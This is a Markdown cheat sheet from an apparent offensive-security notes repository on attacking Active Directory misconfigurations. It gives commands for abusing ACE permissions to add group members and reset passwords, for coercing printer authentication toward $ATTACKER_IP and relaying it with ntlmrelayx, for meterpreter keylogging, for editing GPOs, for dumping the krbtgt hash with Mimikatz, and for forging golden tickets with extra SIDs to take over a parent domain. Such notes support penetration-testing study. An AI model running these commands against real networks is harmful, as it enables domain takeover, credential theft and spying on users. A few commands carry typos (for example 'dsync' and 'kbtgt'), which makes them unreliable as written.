killchain-compendium/misc/active_directory/ad_misconfiguration.md

184 lines
5.7 KiB
Markdown
Raw Normal View History

2022-07-06 22:49:06 +02:00
# Active Directory Misconfigurations
## Permission Delegation
* Permissions to functions may be delegated as a standard functions itself
* Privilege creep becomes a problem eventually
* Discretionary ACLs are controlled by Access Control Entries (ACEs)
### The following ACEs are critical and prone to be exploited
* __GenericAll__, complete control and creation of an object
* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
* __AddMembers__, add a user to an existing group
* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
* __WriteOwner__, change owner of a target object.
* __WriteDACL__, create new ACEs to an object's DACL
* __AllExtendendRights__ all control over an object's permission
### Tools to exploit ACEs
* AD-RSAT
* Powersploit
* BloodHound, check permissions to target
### Usage
* Add user to a group via powershell
```sh
Add-GroupMember "<GroupName>" -Members "<username>"
```
* List info about groups, preferably administration groups
```sh
Get-ADGroupMember -Identity "<GroupName>"
```
2022-08-27 00:43:09 +02:00
* __Set new password for user__, afterwards reconnect session
2022-07-06 22:49:06 +02:00
```sh
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
```
## Kerberos Delegation
* Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976)
* Constrained delegation
* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
### Delegatable Services
* __HTTP__
* __CIFS__
* __LDAP__
* __HOST__
* __MSSQL__
### Usage
* Enumerate via powerview
```sh
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
```
## Automated Relays
### Machine Accounts
* Administrative machine account of one host having administrative permissions over another host
### Printers
* Target has to have an SMB server
* Spooler, PetitPotam, PrintNightmare are printer exploits
* Query printer services through a servers domain
```sh
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
```
* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
```sh
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
```
* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
```
* Authenticate on attacker with the credentials already gained from a windows computer
```sh
SpoolSample.exe <domain> "$ATTACKER_IP"
```
* Authenticate with the received credential
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
```
## Active Directory Users
### Credentials
### Keylogging
* With a meterpreter shell migrate to an active user's process and set a keylogger
```sh
migrate <processID>
keyscan_start
```
* To inspect the results
```sh
keyscan_dump
```
## Group Policy Objects
* Every `GPO` has a `GUID`
* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
* Other local policies are group memberships, startup config, protocols
* Group policies change configuration of these remotely over AD
* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain
### Usage
* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
* Start a `cmd` with a AD user and execute `mmc` through it
```sh
runas /netonly /user:<domain>\<username> cmd.exe
mmc
```
* Check connection of the `cmd.exe` via
```sh
dir \\<domain>\sysvol
```
* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups
## Certificates
* [AD Certificate Services](./AD_CS.md)
## Domain Trusts
* Domain Trusts offer access to resources to users in the domain
* Directional, from trusted domain to another truster domain
* Transitive, beyond more than just one other domain
* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
* `krbtgt` as an account signs and encrypts TGTs
* Crafting a golden ticket by becoming a TGS. Following info is needed
* FQDN
* Security identifier of the domain (SI)
* Target's username
* __KRBTGT password hash__ store on the DC
### Usage
* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
```sh
privilege::debug
lsadump::dsync /user:<username\kbtgt>
```
* Craft the ticket with the help of this hash
* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
* Get child SIDs via
```sh
Get-ADComputer -Identity "<DCChildCN>"
```
* Get parent SID via
```sh
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
```
* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
```sh
privilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$
```